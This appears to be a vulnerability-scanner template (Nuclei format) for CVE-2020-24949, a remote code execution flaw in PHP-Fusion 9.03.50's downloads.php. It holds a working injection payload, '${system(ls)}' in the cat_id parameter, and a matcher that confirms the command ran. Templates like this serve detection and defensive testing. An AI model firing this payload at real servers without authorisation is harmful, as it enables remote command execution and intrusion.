id: CVE-2020-24949 info: name: PHPFusion 9.03.50 Remote Code Execution author: geeknik severity: high description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE). reference: https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt tags: cve,cve2020,phpfusion,rce,php requests: - method: GET path: - "{{BaseURL}}/infusions/downloads/downloads.php?cat_id=${system(ls)}" matchers-condition: and matchers: - type: status status: - 200 - type: word part: body words: - "infusion_db.php"